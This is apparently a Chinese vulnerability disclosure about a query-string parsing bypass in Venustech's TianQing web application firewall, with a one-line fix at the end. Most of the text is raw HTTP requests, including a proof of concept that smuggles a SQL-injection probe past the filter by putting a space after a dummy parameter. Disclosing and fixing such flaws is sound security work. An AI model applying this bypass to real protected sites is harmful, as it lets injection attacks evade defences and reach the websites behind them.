啟明星辰天清Web應(yīng)用安全網(wǎng)關(guān)協(xié)議解析繞過(guò)漏洞

    啟明星辰天清Web應(yīng)用安全網(wǎng)關(guān)中存在協(xié)議解析繞過(guò)漏洞，該漏洞源于對(duì)http協(xié)議兼容未正確處理。攻擊者可利用該漏洞繞過(guò)WAF對(duì)于querystring的所有過(guò)濾，從而攻擊受保護(hù)的網(wǎng)站。
    Servlet/2.5等jsp處理容器，能夠正確處理http協(xié)議GET /news.jsp?x= &id=16 HTTP/1.1中參數(shù)&id=16前面的空格獲取id=16這個(gè)參數(shù)，例如下數(shù)據(jù)包返回網(wǎng)頁(yè)正常：


    GET /news.jsp?x= &id=16 HTTP/1.1

    Accept: text/html, application/xhtml+xml, */*

    Accept-Language: zh-CN

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

    Connection: close

    Host: www.test.com

    Pragma: no-cache





    與http://www.test.com/news.jsp?id=16返回網(wǎng)頁(yè)相同。





    而啟明星辰天清Web應(yīng)用安全網(wǎng)關(guān)解析協(xié)議時(shí)，會(huì)忽略GET /news.jsp?x= &id=16%20and%201=1 HTTP/1.1中"?x=空格"之后的參數(shù)，從而繞過(guò)防護(hù)。

    例直接訪問(wèn)：http://www.test.com/news.jsp?x=%20&id=16%20and%201=1會(huì)攔截

    構(gòu)造如下poc繞過(guò)：

    GET /news.jsp?x= &id=16%20and%201=1 HTTP/1.1

    Accept: text/html, application/xhtml+xml, */*

    Accept-Language: zh-CN

    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

    Connection: close

    Host: www.test.com

    Pragma: no-cache

    修復(fù)方案：

    正確解析http請(qǐng)求第一行中 url參數(shù)帶空格字符后的參數(shù)